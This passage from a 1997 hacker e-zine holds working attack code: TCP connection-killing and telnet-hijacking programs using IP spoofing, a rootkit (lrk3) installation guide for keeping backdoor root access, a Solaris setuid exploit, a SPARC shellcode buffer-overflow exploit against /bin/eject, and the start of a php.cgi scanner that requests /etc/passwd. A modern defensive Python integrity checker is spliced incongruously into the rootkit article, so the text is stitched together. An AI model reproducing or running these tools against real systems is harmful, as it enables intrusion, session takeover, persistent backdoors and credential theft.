            (ntohs(wp_tcphead->destination)==wp_dest_port) )
          {
          if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) )
            {
            ret_values->seq=ntohl(wp_tcphead->seq_nr);
            ret_values->ack=ntohl(wp_tcphead->ACK_nr);
            ret_values->flags=ntohs(wp_tcphead->offset_flag)&
                              (URG|ACK|PSH|FIN|RST|SYN);
            /* data length = IP total length - IP header length (IHL*4)
               - TCP header length; the data offset is in 32-bit words in
               the top 4 bits, so (x>>12)<<2 is written here as x>>10 */
            ret_values->datalen = ntohs(wp_iphead->length) -
                                  ((wp_iphead->verlen & 0xF) << 2) -
                                  ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10);
            alarm(0);
            return 0;
            }
          }
        }
      }
    }
  /*impossible to get
    here.. but anyways*/
  alarm(0);
  return -1;
}

void close_receiving (void)
{
  close(rc_fd_abc123);
}

void rc_sigio (int sig)                  /* Packet handling routine */
{
  char rc_buffer[1500];
  char packet_id [50];
  unsigned char *rc_so, *rc_dest;
  struct IP_header *rc_IPhead;
  struct TCP_header *rc_TCPhead;
  int pack_len;

  if(RC_FILTSET==0) return;
  if(SP_DATA_BUSY!=0)                    /* skip this packet */
    return;

  pack_len = read(rc_fd_abc123,rc_buffer,1500);

  rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX);
  if(rc_IPhead->protocol!=6) return;     /* if not TCP */
  rc_TCPhead = (struct TCP_header *) (rc_buffer + DEV_PREFIX + ((rc_IPhead->verlen & 0xF) << 2));

  rc_so = (unsigned char *) &(rc_IPhead->source);
  rc_dest = (unsigned char *) &(rc_IPhead->destination);

  sprintf(packet_id,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
          rc_so[0],rc_so[1],rc_so[2],rc_so[3],ntohs(rc_TCPhead->source),
          rc_dest[0],rc_dest[1],rc_dest[2],rc_dest[3],ntohs(rc_TCPhead->destination));

  if(strcmp(packet_id,rc_filter_string)==0)
    {
    SP_DATA_BUSY=1;
    CUR_SEQ = ntohl(rc_TCPhead->seq_nr);
    CUR_ACK = ntohl(rc_TCPhead->ACK_nr);
    CUR_FLAGS = ntohs(rc_TCPhead->offset_flag);
    CUR_DATALEN = ntohs(rc_IPhead->length) -
                  ((rc_IPhead->verlen & 0xF) << 2) -
                  ((ntohs(rc_TCPhead->offset_flag) & 0xF000) >> 10);
    CUR_COUNT++;
    SP_DATA_BUSY=0;
    }
}

void set_filter (char *f_source, unsigned short f_source_port,
                 char *f_dest, unsigned short f_dest_port)
{
  unsigned char *f_so, *f_des;
  unsigned long f_sol, f_destl;

  RC_FILTSET=0;
  if(DEV_PREFIX==9999)
    fprintf(stderr,"DEV_PREFIX not set!\n"), exit(1);
  f_sol = sp_getaddrbyname(f_source);
  f_destl = sp_getaddrbyname(f_dest);
  f_so = (unsigned char *) &f_sol;
  f_des = (unsigned char *) &f_destl;
  sprintf(rc_filter_string,"%u.%u.%u.%u.%u-%u.%u.%u.%u.%u",
          f_so[0],f_so[1],f_so[2],f_so[3],f_source_port,
          f_des[0],f_des[1],f_des[2],f_des[3],f_dest_port);
  RC_FILTSET=1;
}

---=[ sniper-rst.c ]=---------------------------------------------------------

/**************************************************************************/
/* Sniper-rst -
   Example program on connection killing with IP spoofing
   using the RST flag.
   (illustration for 'A short overview of IP spoofing')

   Purpose - Killing any TCP connection on your subnet

   Author  - Dr_Sp00f (Himself)
             Serious advice, comments, statements, greets, always welcome
             flames, moronic 3l33t >/dev/null

   Disclaimer - This program is for educational purposes only. I am in
             NO way responsible for what you do with this program,
             or any damage you or this program causes.

   For whom - People with a little knowledge of TCP/IP, C source code
             and general UNIX. Otherwise, please keep your hands off,
             and catch up on those things first.

   Limited to - Linux 1.3.X or higher.
             ETHERNET support ("eth0" device)
             If your network configuration differs it shouldn't be too
             hard to modify yourself. I got it working on PPP too,
             but I'm not including extra configuration possibilities
             because this would overload this first release that is
             only a demonstration of the mechanism.
             Anyway, if you only have ONE network device (slip,
             ppp,... ) after a quick look at this code and spoofit.h
             it will only take you a few secs to fix it...
             People with a bit of C knowledge who know their OS well
             shouldn't have too much trouble porting the code.
             If you do, I would love to get the results.

   Compiling - gcc -o sniper-rst sniper-rst.c

   Usage - Usage described in the spoofing article that came with this.
           If you didn't get this, try to get the full release...
 */
/* See also - Sniffit (for getting the necessary data on a connection)    */
/**************************************************************************/

#include "spoofit.h"

/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"
#define INTERFACE_PREFIX 14

char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;

void main(int argc, char *argv[])
{
  int i,stat,j;
  int fd_send, fd_receive;
  unsigned long sp_ack, sp_seq;
  unsigned short flags;
  struct sp_wait_packet pinfo;

  if(argc != 5)
    {
    printf("usage: %s host1 port1 host2 port2\n",argv[0]);
    exit(0);
    }

  /* preparing some work */
  DEV_PREFIX = INTERFACE_PREFIX;
  strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]);
  strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]);

  /* opening sending and receiving sockets */
  fd_send = open_sending();
  fd_receive = open_receiving(INTERFACE, IO_NONBLOCK);   /* nonblocking IO */

  printf("Trying to terminate the connection\n");
  for(i=1;i<=100;i++)
    {
    /* Waiting for a packet containing an ACK */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,5);
    if(stat==-1)
      {printf("Connection 5 secs idle or dead...\n");exit(1);}
    sp_seq=pinfo.ack;
    sp_ack=0;
    j=0;

    /* Sending our fake Packet */
    /* for(j=0;j<10;j++)   This would be better */
    /*   {                                      */
    transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
                  sp_seq+j,sp_ack,RST);
    /*   }                                      */

    /* waiting for confirmation */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,0,5);
    if(stat<0)
      {
      printf("Connection 5 secs idle or dead...\n");
      exit(0);
      }
    }
  printf("I did not succeed in killing it.\n");
}

---=[ sniper-fin.c ]=---------------------------------------------------------

/**************************************************************************/
/* Sniper-fin - Example program on connection killing with IP spoofing
   using the FIN flag.
 */
/*
   (illustration for 'A short overview of IP spoofing')

   Purpose - Killing any TCP connection on your subnet

   Author  - Dr_Sp00f (Himself)
             Serious advice, comments, statements, greets, always welcome
             flames, moronic 3l33t >/dev/null

   Disclaimer - This program is for educational purposes only. I am in
             NO way responsible for what you do with this program,
             or any damage you or this program causes.

   For whom - People with a little knowledge of TCP/IP, C source code
             and general UNIX. Otherwise, please keep your hands off,
             and catch up on those things first.

   Limited to - Linux 1.3.X or higher.
             ETHERNET support ("eth0" device)
             If your network configuration differs it shouldn't be too
             hard to modify yourself. I got it working on PPP too,
             but I'm not including extra configuration possibilities
             because this would overload this first release that is
             only a demonstration of the mechanism.
             Anyway, if you only have ONE network device (slip,
             ppp,... ) after a quick look at this code and spoofit.h
             it will only take you a few secs to fix it...
             People with a bit of C knowledge who know their OS well
             shouldn't have too much trouble porting the code.
             If you do, I would love to get the results.

   Compiling - gcc -o sniper-fin sniper-fin.c

   Usage - Usage described in the spoofing article that came with this.
           If you didn't get this, try to get the full release...
 */
/* See also - Sniffit (for getting the necessary data on a connection)    */
/**************************************************************************/

#include "spoofit.h"

/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"
#define INTERFACE_PREFIX 14

char SOURCE[100],DEST[100];
int SOURCE_P,DEST_P;

void main(int argc, char *argv[])
{
  int i,stat;
  int fd_send, fd_receive;
  unsigned long sp_ack, sp_seq;
  unsigned short flags;
  struct sp_wait_packet pinfo;

  if(argc != 5)
    {
    printf("usage: %s host1 port1 host2 port2\n",argv[0]);
    exit(0);
    }

  /* preparing some work */
  DEV_PREFIX = INTERFACE_PREFIX;
  strcpy(SOURCE,argv[1]); SOURCE_P=atoi(argv[2]);
  strcpy(DEST,argv[3]); DEST_P=atoi(argv[4]);

  /* opening sending and receiving sockets */
  fd_send = open_sending();
  fd_receive = open_receiving(INTERFACE, IO_NONBLOCK);   /* nonblocking IO */

  for(i=1;i<100;i++)
    {
    printf("Attack Sequence %d.\n",i);

    /* Waiting for a packet containing an ACK */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,ACK,10);
    if(stat==-1)
      {printf("Connection 10 secs idle... timeout.\n");exit(1);}
    sp_seq=pinfo.ack;
    sp_ack=pinfo.seq+pinfo.datalen;

    /* Sending our fake Packet */
    transmit_TCP (fd_send, NULL,0,0,0,DEST,DEST_P,SOURCE,SOURCE_P,
                  sp_seq,sp_ack,ACK|FIN);

    /* waiting for confirmation */
    stat=wait_packet(fd_receive,&pinfo,SOURCE,SOURCE_P,DEST,DEST_P,FIN,5);
    if(stat>=0)
      {
      printf("Killed the connection...\n");
      exit(0);
      }
    printf("Hmmmm.... no response detected... (retry)\n");
    }
  printf("I did not succeed in killing it.\n");
}

---=[ hijack.c ]=-------------------------------------------------------------

/**************************************************************************/
/* Hijack - Example program on connection hijacking with IP spoofing
            (illustration for 'A short overview of IP spoofing')

   Purpose - taking control of a running telnet session, and executing
             our own command in that shell.
 */
/*
   Author  - Dr_Sp00f (Himself)
             Serious advice, comments, statements, greets, always welcome
             flames, moronic 3l33t >/dev/null

   Disclaimer - This program is for educational purposes only. I am in
             NO way responsible for what you do with this program,
             or any damage you or this program causes.

   For whom - People with a little knowledge of TCP/IP, C source code
             and general UNIX. Otherwise, please keep your hands off,
             and catch up on those things first.

   Limited to - Linux 1.3.X or higher.
             ETHERNET support ("eth0" device)
             If your network configuration differs it shouldn't be too
             hard to modify yourself. I got it working on PPP too,
             but I'm not including extra configuration possibilities
             because this would overload this first release that is
             only a demonstration of the mechanism.
             Anyway, if you only have ONE network device (slip,
             ppp,... ) after a quick look at this code and spoofit.h
             it will only take you a few secs to fix it...
             People with a bit of C knowledge who know their OS well
             shouldn't have too much trouble porting the code.
             If you do, I would love to get the results.

   Compiling - gcc -o hijack hijack.c

   Usage - Usage described in the spoofing article that came with this.
           If you didn't get this, try to get the full release...

   See also - Sniffit (for getting the necessary data on a connection)
 */
/**************************************************************************/

#include "spoofit.h"               /* My spoofing include....
                                      read licence on this */

/* Those 2 'defines' are important for putting the receiving device in */
/* PROMISCUOUS mode */
#define INTERFACE "eth0"           /* first ethernet device */
#define INTERFACE_PREFIX 14        /* 14 bytes is an ethernet header */

#define PERSONAL_TOUCH 666

int fd_receive, fd_send;
char CLIENT[100],SERVER[100];
int CLIENT_P;

void main(int argc, char *argv[])
{
  int i,j,count;
  struct sp_wait_packet attack_info;
  unsigned long sp_seq ,sp_ack;
  unsigned long old_seq ,old_ack;
  unsigned long serv_seq ,serv_ack;

  /* This data used to clean up the shell line */
  char to_data[]={0x08, 0x08,0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x0a, 0x0a};
  char evil_data[]="echo \"echo HACKED\" >>$HOME/.profile\n";

  if(argc!=4)
    {
    printf("Usage: %s client client_port server\n",argv[0]);
    exit(1);
    }
  strcpy(CLIENT,argv[1]);
  CLIENT_P=atoi(argv[2]);
  strcpy(SERVER,argv[3]);

  /* preparing all necessary sockets (sending + receiving) */
  DEV_PREFIX = INTERFACE_PREFIX;
  fd_send = open_sending();
  fd_receive = open_receiving(INTERFACE, 0);   /* normal BLOCKING mode */

  printf("Starting Hijacking demo - Brecht Claerhout 1996\n");
  printf("-----------------------------------------------\n");
  for(j=0;j<50;j++)
    {
    printf("\nTakeover phase 1: Stealing connection.\n");
    wait_packet(fd_receive,&attack_info,CLIENT, CLIENT_P, SERVER, 23,ACK|PSH,0);
    sp_seq=attack_info.seq+attack_info.datalen;
    sp_ack=attack_info.ack;

    printf("  Sending Spoofed clean-up data...\n");
    transmit_TCP(fd_send, to_data,0,0,sizeof(to_data),CLIENT, CLIENT_P, SERVER,23,
                 sp_seq,sp_ack,ACK|PSH);

    /* NOTE: always beware you receive y'r OWN spoofed packs!
*/ /* so handle it if necessary */ count=0; printf(" Waiting for spoof to be confirmed...\n"); while(count<5) { wait_packet(fd_receive, &attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==sp_seq+sizeof(to_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 1 unsuccesfully ended.\n");} else {printf("Phase 1 ended.\n"); break;}; }; printf("\nTakeover phase 2: Getting on track with SEQ/ACK's again\n"); count=serv_seq=old_ack=0; while(count<10) { old_seq=serv_seq; old_ack=serv_ack; wait_packet(fd_receive,&attack_info,SERVER, 23, CLIENT, CLIENT_P, ACK,0); if(attack_info.datalen==0) { serv_seq=attack_info.seq+attack_info.datalen; serv_ack=attack_info.ack; if( (old_seq==serv_seq)&&(serv_ack==old_ack) ) count=PERSONAL_TOUCH; else count++; } }; if(count!=PERSONAL_TOUCH) {printf("Phase 2 unsuccesfully ended.\n"); exit(0);} printf(" Server SEQ: %X (hex) ACK: %X (hex)\n",serv_seq,serv_ack); printf("Phase 2 ended.\n"); printf("\nTakeover phase 3: Sending MY data.\n"); printf(" Sending evil data.\n"); transmit_TCP(fd_send, evil_data,0,0,sizeof(evil_data),CLIENT,CLIENT_P, SERVER,23,serv_ack,serv_seq,ACK|PSH); count=0; printf(" Waiting for evil data to be confirmed...\n"); while(count<5) { wait_packet(fd_receive,&attack_info,SERVER,23,CLIENT,CLIENT_P,ACK,0); if(attack_info.ack==serv_ack+sizeof(evil_data)) count=PERSONAL_TOUCH; else count++; }; if(count!=PERSONAL_TOUCH) {printf("Phase 3 unsuccesfully ended.\n"); exit(0);} printf("Phase 3 ended.\n"); } 2. Using LinuxRootKitIII : suid Rooting machines is just half the fun, the whole point to owning something is being able to keep root for as long as possible. To do this many kind people have released what are known as root kits. There are currently root kits available for a plethora of operating systems, e.g. Linux, SunOS, and FreeBSD. 
What a root kit does is install many backdoored and trojanised programs to
replace the existing programs which are used to perform the basic tasks of the
host you owned. These tasks include: logging in, listing files, listing
processes and so on.

This article focuses on a Linux system, mainly because these are the most
generally rooted by the masses. There are a few versions of the rootkit around.
The main two you should have are LinuxRootKitIII and LinuxRootKitII. You should
have both 2 and 3 because they are for different kinds of Linux machine.
Generally, LinuxRootKitII (a.k.a. lrk2) is for older Linux kernels (in the 1.x
range) and LinuxRootKitIII (a.k.a. lrk3) is for the newer Linux 2.x kernels.

It should be noted somewhere in this article that you need to have owned
(rooted) the machine _before_ you try and install the rootkit; installing it as
a non-root user won't work, and won't help you root the machine at all. Also it
should be noted that you shouldn't 'test' lrk2/lrk3 on your own machine as it
will probably just fuck you up.

Ok, now comes the part I like. To use lrk2 or 3, you need a few things: a Linux
box of the correct kernel version, root on that machine, and that machine needs
to be able to compile. Once you have that it's not a big problem. I'll take you
through it step by step.

1. Upload the lrk of the correct type.

Remember that it's lrk2 for 1.x kernels and lrk3 for 2.x kernels. To find out
what kernel the remote host is running, type "uname -a" at the prompt; the
number with the two radix points is the kernel version.

Example:

[root@sploitable root] # uname -a
Linux sewid.org 2.0.29 #1 Sat Mar 22 17:39:12 EST 1997 i586

Ex1. This is a Linux 2.0.29 kernel machine.

Uploading the proper root kit can be easily done by ftp'ing to your remote
machine and uploading it that way into some directory on a device with
sufficient room to store lrk uncompressed (lrk3 is over 3mb uncompressed). To
check how much space each device has, type df.

2. Untar/gzip it.
This can easily be done by chdir'ing to wherever you uploaded it in the last
step, then executing the following command:

[root@sploitable root] # tar -zxvf LRKIII.tar.gz

3. Make it.

Linux root kits are quite user friendly provided the installation goes
according to plan. To make the root kit, chdir to wherever it was untarred to
(e.g. in lrk3, you would type "cd lrk3" from the directory you untarred it
from) and back up your existing binaries. To do this it's best to know where
they are. Here's a list of the binaries' existing locations on a common Linux
system. You should copy all of these as shown.

/bin/login
/usr/bin/passwd
/bin/ps
/bin/ls
/bin/netstat
/usr/bin/du
/usr/bin/top
/usr/bin/rsh
/sbin/ifconfig
/usr/bin/chsh
/usr/bin/chfn
/usr/sbin/inetd

If one of these files isn't on your system, or not in the directory mentioned
above, try to find it using the 'whereis' command.

Example:

[root@sploitable lrk3] # whereis inetd
inetd: /etc/inetd.conf /usr/lbin/inetd /usr/man/man8/inetd.8

Bingo, you found inetd hiding in /usr/lbin.

I suggest copying all these to a directory called bin_bak or something under
your lrk dir. Something like "cp /bin/ls ./bin_bak" for all of them is a good
start.

Ok, now you've taken precautions, modify the rootkit.h file that is in the lrk
directory. The minimum you should change is the default rootkit password:

Example:

#define ROOTKIT_PASSWORD "lrkr0x"

Change this to...

#define ROOTKIT_PASSWORD "code-0"

Or anything you want that is *6 CHARACTERS LONG*. Ok, that's it. Now you're
ready to compile; this part is taken care of by the make file. All you need to
do is type:

"make all install"

The make file takes all the source, compiles it, and places the new backdoored
binaries into all the right places for you.

It should be noted that once backdoored you should _NEVER_ attempt to change
your rootkit password with the 'passwd' command. The root password is NOT THE
SAME AS YOUR ROOTKIT PASSWORD.
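The list of binaries above is exactly what an administrator checks when lrk is suspected. As an added defender's example (not part of this article, nor lrk's own code), the script below records a baseline of those binaries and reports any that later differ in mode, size or SHA-256, which is how a replaced login/ls/ps gets spotted. The paths are the article's list; the temporary directory tree and its file contents are constructed here so the script runs offline, and the function names are the example's own.

```python
# Added example, not from the zine or from lrk: baseline-and-verify check for
# the binaries a rootkit such as lrk3 replaces. The sample tree is constructed.
import hashlib
import os
import tempfile

# The binaries the article says lrk replaces (paths from the article's list).
LRK_TARGETS = [
    "/bin/login", "/usr/bin/passwd", "/bin/ps", "/bin/ls", "/bin/netstat",
    "/usr/bin/du", "/usr/bin/top", "/usr/bin/rsh", "/sbin/ifconfig",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/sbin/inetd",
]


def sha256_of(path):
    """Hash a file by reading it directly; a trojaned ls/ps cannot hide this."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_baseline(root, targets=LRK_TARGETS):
    """Record hash, size and mode of each target under root ('' for the live host)."""
    baseline = {}
    for rel in targets:
        path = root + rel
        if not os.path.exists(path):
            baseline[rel] = None  # absent at baseline time, noted as such
            continue
        st = os.stat(path)
        baseline[rel] = {"sha256": sha256_of(path), "size": st.st_size, "mode": st.st_mode}
    return baseline


def verify(root, baseline):
    """Return {path: reason} for every target that no longer matches the baseline."""
    findings = {}
    for rel, expected in baseline.items():
        path = root + rel
        if expected is None:
            if os.path.exists(path):
                findings[rel] = "appeared since baseline"
            continue
        if not os.path.exists(path):
            findings[rel] = "missing"
            continue
        st = os.stat(path)
        if st.st_mode != expected["mode"]:
            findings[rel] = "mode changed"
        elif st.st_size != expected["size"] or sha256_of(path) != expected["sha256"]:
            findings[rel] = "contents changed"
    return findings


def demo():
    """Constructed demo: fake root tree, baseline, then 'replace' ls and drop chsh."""
    root = tempfile.mkdtemp()
    for rel in LRK_TARGETS:
        os.makedirs(os.path.dirname(root + rel), exist_ok=True)
        with open(root + rel, "wb") as f:
            f.write(b"pretend original binary " + rel.encode())
    baseline = build_baseline(root)
    with open(root + "/bin/ls", "wb") as f:      # the kind of swap lrk's make does
        f.write(b"trojaned ls that hides files")
    os.remove(root + "/usr/bin/chsh")
    return verify(root, baseline)


if __name__ == "__main__":
    for path, reason in sorted(demo().items()):
        print(f"{path}: {reason}")
```

Take the baseline before the host is exposed and keep it off the host; the lrk replacements listed above subvert ls, ps and netstat, not raw file reads, so an interpreter started from trusted media sees the real contents. A kit that also patches the kernel defeats any userland check like this, so the baseline is normally cross-checked against vendor package checksums as well.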
You may be able to log into the system by typing "root" at the login prompt and
then some password at the password prompt, but this is a BACKDOOR; it does not
mean the root password is the same as the one you put in rootkit.h.

Happy Ownership.

suid 1997.

===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================

Well, that was issue 1, hope ya'll liked it, don't forget to visit...

==================> http://www.codez.com UP FUCKEN NOW!@# <==================

And that ends everything, sorry if we spent a little too long straightening
some shit out with sIn, but you deserve to know the truth...

Until next time, when there will be 950 days until the year 2000...

The CodeZero.

===============================================================================
==================> http://www.codez.com UP FUCKEN NOW!@# <==================
===============================================================================

Remember, Mcdonalds Owns You, And Ronald Is The KinG!!! Wendy Is Satan!!
Don't Believe The Lies!! PHEAR WENDY!@#*

===============================================================================
=--------------------=====================================--------------------=
=--------------------= Status : Confidence Remains High. =--------------------=
=--------------------= Issue  : 002.                     =--------------------=
=--------------------= Date   : May 26th 1997.           =--------------------=
=--------------------=====================================--------------------=
===============================================================================
=====================> http://www.codez.com NOW UP!@#* <=====================
===============================================================================

.:. Site Of The Month .:.

=====================> http://www.codez.com NOW UP!@#* <=====================

In This HUUUUUUuuuUUUUUGE Issue :

-----=> Section A : Introduction And Cover Story.

1. Confidence Remains High Issue 2....................: Tetsu Khan
2. wh0 the King?......................................: so1o
3. www.codez.com......................................: fr1day

-----=> Section B : Exploits And Code.

1. Unpatched Solaris 2.3 / 2.4 Exploit -=> solsuid.c.: Shawn Instenes
2. Pretty Useful Solaris 2.5.1 Exploit -=> ban251.c..: s0me Bugtraq d00d
3. Scan For php Vunerable Servers ------=> phpscan.c.: so1o
4. Use php.cgi To Get Files ------------=> phpget.c..: p1
5. Hiding From Who (incase you didn't read the pilots): so1o
6. Sendmail 8.8.4 / 8.8.5 LOCAL Exploit...............: p1
7. Ident Scanner (ident-scan.c).......................: Dave Goldsmith
8. Windoze NT / 95 Killer : winnuke.c.................: _eci

-----=> Section C : Phones / Scanning / Radio.

1. Federal Bugging Frequencies........................: Weapon-X
2. 911 Autodialler Script.............................: dk
3. Cellular Calls Without Cloning.....................: TRON

-----=> Section D : Miscellaneous.

1. Getting Your Exploits Onto Systems.................: so1o
2. Fakemailing Techniques.............................: so1o
3. Pascal Credit Card Generator Source................: Lobster Guacamole
4. in.courierd : backdoor on port 530.................: so1o
5. UK Laws On Computer Misuse.........................: Darkfool
6. so1o Gets Busted By CERT...........................: so1o
7. CERT Advisory CA-97.13 : xlock vunerablity.........: BugTraq
8. IRiX WWW Server Bugs...............................: Tetsu Khan
9. Hacking Not-So-Electrical Items....................: Tetsu Khan

-----=> Section E : World News.

1. Amnesty International Hacked.......................: Article from cnet.com
2. //sToRm// Of sIn Rips Port Pro.....................: so1o
3. Digital Darkness Lives.............................: so1o
4. /home/sdr 0wned....................................: so1o
5. Sendmail 8.8.4 Remote Is Out.......................: so1o
6. sIn inf0z Part 2...................................: The CodeZero

------=> Section F : Projects.

1. The [C]odeZero [R]emote [A]ttack [K]it (CRAK.tar)..: so1o

-----=> Section G : The End.

===============================================================================
==[ INTRO ]====================[ .SECTION A. ]======================[ INTRO ]==
===============================================================================

1. Confidence Remains High Issue 002 : Tetsu Khan

We have been very busy over the last 50 days, but we still managed to put
together the CodeZero Remote Attack Kit, which contains some very cutting edge
tools as well as some very optimised code. We have included all the programs
precompiled to run from a Linux 2.0.x box, this way you don't even need a
compiler to build this shit =) The source will be available when we can be
bothered to put it on our page, so enjoy this second *FREE* issue of...

...Confidence Remains High!

T_K

One last thing, this issue is a BUMPER WWW hacking issue! because CERT and the
IRT are cool, and they think I live in Sweden :)

Here's a disclaimer, just in case anyone does get a bit annoyed :

***************************************************************************
** NONE OF THE DATA CONTAINED WITHIN THIS FILE IS TO BE USED UNETHICALLY **
** USE THIS DATA AT YOUR OWN RISK AND DON'T COME CRYING TO US IF CERT    **
** COME ROUND YOUR HOUSE AND KICK YOUR FUCKING ASS, KILL YOUR PARENTS    **
** AND YOUR DOG AND CONFISCATE ALL YOUR SHIT.                            **
***************************************************************************

2. wh0 the King? : so1o

Okay, here's a rundown of the main groups and associations around the scene on
the efnet at this moment in time, as well as some comments and members...

r00t
====

Many say r00t own us, members include :

aleph1
Veggie
tfish

As in, Aleph One of dfw.net and underground.org, Death Veggie of the cDc,
Tweety Fish of the cDc Ninja Strike Force (I also heard he designed the NHC
security) as well as A LOT of others who are very well known in the
underground. r00t are definitely the biggest group on the scene, and easily
the most powerful.

el8
===

el8 is another very powerful group, with members that between them make el8 a
force to be feared, members include :

prym
bw-
tsal

Overall, a good group, with some very smart people.

The CodeZero
============

We d0nt like to talk about ourselves, boosted up to 7 men now :)

The Secret Mouse Society (sms)
==============================

I don't really know much of this group's true power, but members include...

Calidor
vertex
vortex

They have many shell traders, and therefore probably a lot of influence in the
shells world, as well as experience; quite a large group.

I won't even talk about Undernet groups, seeing they continually split, join
other groups, change names, rip other people's code, shit like that, basically
acting like 12 year old warez kiddies (take sIn for example, or maybe even
Psychosis.)

3. www.codez.com : fr1day

Yah000!!!@# wE gOt A dOmAin!!!@~#

On www.codez.com we will have 40mb of space, this will include the following..

-=[ The Confidence Remains High Distro Point
-=[ The CodeZero Exploits / Programs And Tools Page
-=[ The Solaris 2.4 / 2.5.x Exploit Collection
-=[ The Solaris Tools Collection
-=[ The Solaris CodeZero Tools Collection
-=[ The Linux 2.0.x Exploit Collection
-=[ The Linux Tools Collection
-=[ The Linux CodeZero Tools Collection
-=[ W1nd0ze And d0S Tools Collection
-=[ Assorted Text Philes Collection
-=[ The CodeZero FTP Site
-=[ H/P/A/V/C E-Zine Archive
-=[ CodeZero Precompiled Linux / Solaris Tools And Exploits Archive

So don't delay! GO THERE TODAY!@#

And if you can, please link your sites to www.codez.com, as we would be very
grateful :) Seeing we are basically giving all this shit to you for PHREE!

phr1day

===============================================================================
==[ EXPLOITS ]=================[ .SECTION B. ]===================[ EXPLOITS ]==
===============================================================================

1. Unpatched Solaris 2.3 / 2.4 Exploit : solsuid.c : Shawn Instenes

/* If a tty port that is writeable by the user and owned by root is opened
   and the I_PUSH "ms" ioctl call made followed by an lseek the effective uid
   of the user is changed to root. */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <stropts.h>

main(argc, argv)
int argc;
char* argv[];
{
    int fd;

    if (argc < 2) {
        fprintf(stderr, "usage: %s /dev/ttyX\n", argv[0]);
        exit(1);
    }
    fd = open("/dev/ttyb", O_RDWR);
    printf("Your current effective uid is %d\n", geteuid());
    ioctl(fd, I_PUSH, "ms");
    lseek(fd, 0, 1);
    printf("Your effective uid has been changed to %d\n", geteuid());
}

2. Pretty Useful Solaris 2.5.1 Exploit : ban251.c : s0me bugtraq d00d

/* Written for Solaris 2.5.1 (sunOS 5.5.1) with /bin/eject */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>

#define BUF_LENGTH 364
#define EXTRA 400
#define STACK_OFFSET 400
#define SPARC_NOP 0xa61cc013

u_char sparc_shellcode[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e\x2f\x0b\xda\xdc\xae\x15\xe3\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c\x94\x1a\x80\x0a\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA + 8];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode),dso=0;

  if(argc > 1) dso=atoi(argv[1]);

  long_p =(u_long *) buf ;
  targ_addr = get_sp() - STACK_OFFSET - dso;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;
  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ =targ_addr;

  printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
         targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
  execl("/bin/eject", "eject", & buf[1],(char *) 0);
  perror("execl failed");
}

3. Scan For php Vunerable Servers : phpscan.c : so1o

The next two programs, phpscan.c and phpget.c, are fully compiled in the
CodeZero Remote Attack Kit; details about the whole kit are in section F, part
2. These two programs use a hole in the php.cgi code that allows remote users
to read any file on the system that the http daemon has access to. Vulnerable
servers I have found include www.2600.com (FreeBSD 2.1), so it does have some
effect. Use phpscan.c to scan from a list of hosts, then phpget.c to retrieve
files from the remote hosts.

Here begins the c0de...

/* phpscan.c : php.cgi vulnerable server scanning program.
   Basically a modified phf scanner, by Alhambra of The Guild.
   Modifications to php.cgi by so1o of The CodeZero.

   Usage: phpscan */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <signal.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#ifdef LINUX
#include <sys/time.h>   /* header name lost from the original text; assumed */
#endif
#include <arpa/inet.h>
#include <netdb.h>

int FLAG = 1;

int Call(int signo)
{
  FLAG = 0;
}

main (int argc, char *argv[])
{
  char host[100], buffer[1024], hosta[1024],FileBuf[8097];
  int outsocket, serv_len, len,X,c,outfd;
  struct hostent *nametocheck;
  struct sockaddr_in serv_addr;
  struct in_addr outgoing;
  char PHPMessage[]="GET cgi-bin/php.cgi?/etc/passwd\n";

  while(fgets(hosta,100,stdin))
  {
    if(hosta[0] == '\0')
      break;
    hosta[strlen(hosta) -1] = '\0';
    write(1,hosta,strlen(hosta)*sizeof(char));
    write(1,"\n",sizeof(char));
